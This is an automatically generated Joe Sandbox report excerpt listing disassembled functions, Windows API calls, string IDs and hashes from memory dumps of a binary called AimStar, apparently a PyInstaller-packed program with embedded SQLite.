                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                          • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                          • Instruction ID: 853c3a26a537e7d2465522cde10f4a0b5f18e21b3eef837394acedc0993c0b6b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7316031B1EE4291EE12BB16A802965B39CBF58BB0F994535ED1D8B384DF3CF449C224
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF710F4351A,?,00000000,00007FF710F43F23), ref: 00007FF710F42AA0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                          • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                          • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                          • Instruction ID: 0f0f0d5a9249bc98915b7cc3474f4b9a530fc357db95e0eb6dc3a63627fc87c9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A21713261CB8152E660AB51B8427E6B398BB88794F800132EE8C93759DF3CE249C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 995526605-0
                                                                                                                                                                                                                                          • Opcode ID: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
                                                                                                                                                                                                                                          • Instruction ID: 4cb4539ae922a3e53de7249358d85fd9cb5074120d151f59e427136b93f93a90
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14217531A0CE4642EB10AB59F45166EE7A8FB857B0F900235EA6C837E4DE6CF449C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                                          • Opcode ID: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
                                                                                                                                                                                                                                          • Instruction ID: ec8c900ca757510be56ef085bbb0fbb0c40bb3f20410fca852bcff1081ca1fb1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9218920E0CE0A42FA69B761565713DE16A4F487B0FC44234E93E46BD6DE2CB608C731
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                          • String ID: CONOUT$
                                                                                                                                                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                          • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                          • Instruction ID: 732320e3b8c495d97d97ede59262e3ee1c6437d447202657a45c83e13bf318aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7311842561CF4586E351AB52E85A329F3A8FB98BF4F400234E95D87794DF7CE848C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
                                                                                                                                                                                                                                          • API String ID: 2830847230-1299490920
                                                                                                                                                                                                                                          • Opcode ID: 8e630c645816d975f518878cd955397d3cf89de65cacaaa3ad1208967ec55729
                                                                                                                                                                                                                                          • Instruction ID: e80f43212ad6072aa137adc3874dacc9b99f48bb7fa4231ee688441f3129bc52
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e630c645816d975f518878cd955397d3cf89de65cacaaa3ad1208967ec55729
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A202EC72A0AB86A2EB548B21E44037E77A5FB85BD4F044272DE9D07B95EF3CE441C324
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF710F49216), ref: 00007FF710F48592
                                                                                                                                                                                                                                          • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F485E9
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F49400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF710F445E4,00000000,00007FF710F41985), ref: 00007FF710F49439
                                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F48678
                                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F486E4
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F486F5
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F4870A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3462794448-0
                                                                                                                                                                                                                                          • Opcode ID: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
                                                                                                                                                                                                                                          • Instruction ID: 899c541852678944eeb4ddca8fe1334a2deef6c816ae896d4c09df081b2c4361
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2441B732B1DA8641E670AB11A552AAEA398FF44BE4F850035DF4D97789DF3CF50AC720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                          • API String ID: 2830847230-3727861699
                                                                                                                                                                                                                                          • Opcode ID: 8c52ddcc36590edf680ba46134fdbbf73a088618ff38eaf43da130e1a75dd050
                                                                                                                                                                                                                                          • Instruction ID: f65c0a14cc34836c27c8fb1ebed8279a91000b9efc81796948e7c9f6e5838e42
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c52ddcc36590edf680ba46134fdbbf73a088618ff38eaf43da130e1a75dd050
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94F19A7260AB8196DB90CF19E4407AE77A4FB89BD4F108036EE8E43795DF39D884C714
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48760: GetCurrentProcess.KERNEL32 ref: 00007FF710F48780
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48760: OpenProcessToken.ADVAPI32 ref: 00007FF710F48793
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48760: GetTokenInformation.ADVAPI32 ref: 00007FF710F487B8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48760: GetLastError.KERNEL32 ref: 00007FF710F487C2
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48760: GetTokenInformation.ADVAPI32 ref: 00007FF710F48802
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF710F4881E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48760: CloseHandle.KERNEL32 ref: 00007FF710F48836
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF710F43C55), ref: 00007FF710F4916C
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF710F43C55), ref: 00007FF710F49175
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                          • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                          • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                          • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                          • Instruction ID: 532235cf7e9e6ed5e2707603178fabec15aacca371d74e7af265ef332ab54cfd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09214C35A0CE4241E650BB10E9166EAA3A8EB897A0FC40031EE4D93796DF3CF849C760
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                          • API String ID: 2830847230-3727861699
                                                                                                                                                                                                                                          • Opcode ID: 3655e22da9e07da38f3769848262744f944a14fbb408cd692dcf19944dac75b3
                                                                                                                                                                                                                                          • Instruction ID: 5f8d26c340d54c67f8f86a890aec9dcfccba13f3be1808187526c51ba56540f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3655e22da9e07da38f3769848262744f944a14fbb408cd692dcf19944dac75b3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40D1CE72B0A78596EB60CF29E0807A9B7A5FB84B84F564032DE4D47798EF3CD841CB54
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B347
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B37D
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B3AA
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B3BB
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B3CC
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B3E7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                                          • Opcode ID: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
                                                                                                                                                                                                                                          • Instruction ID: 7b2d6a4d612f110421e969019983c97df14bb56d209800f702c30a659077b510
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36118C20A0CE4A82FA54B721565713DE2AA5F487B0FC44334E82E567C6DE2CB60DC721
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: "%w" $%Q%s
                                                                                                                                                                                                                                          • API String ID: 2830847230-1987291987
                                                                                                                                                                                                                                          • Opcode ID: 4996da17ddfec1dee6660f65e02a5f8beeb701232fff484e3028168577d632cb
                                                                                                                                                                                                                                          • Instruction ID: 5ec4e86be49ceef33c3666e66b0684f18cd76ceb36fcdf2c03df8f30bddddc3c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4996da17ddfec1dee6660f65e02a5f8beeb701232fff484e3028168577d632cb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67C1E322B4AB82A6EA14CF15A44037AA7A1FB85BE0F144235DE6E077D5DF3CE461C724
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                          • API String ID: 2830847230-3727861699
                                                                                                                                                                                                                                          • Opcode ID: 071cd9badcc09f2493c72e810cc68969e4bc8f5cc32b795679ffd7b93dfb2617
                                                                                                                                                                                                                                          • Instruction ID: a498c55e849a93a45b88a165f352d18e6a26fd447fd1ad98cab9aaa91f1cc09e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 071cd9badcc09f2493c72e810cc68969e4bc8f5cc32b795679ffd7b93dfb2617
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3A1B062B0E2D1A6D7648B1994907BE7BA2FB807C0F054236DBCA83681EF3CE555C734
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
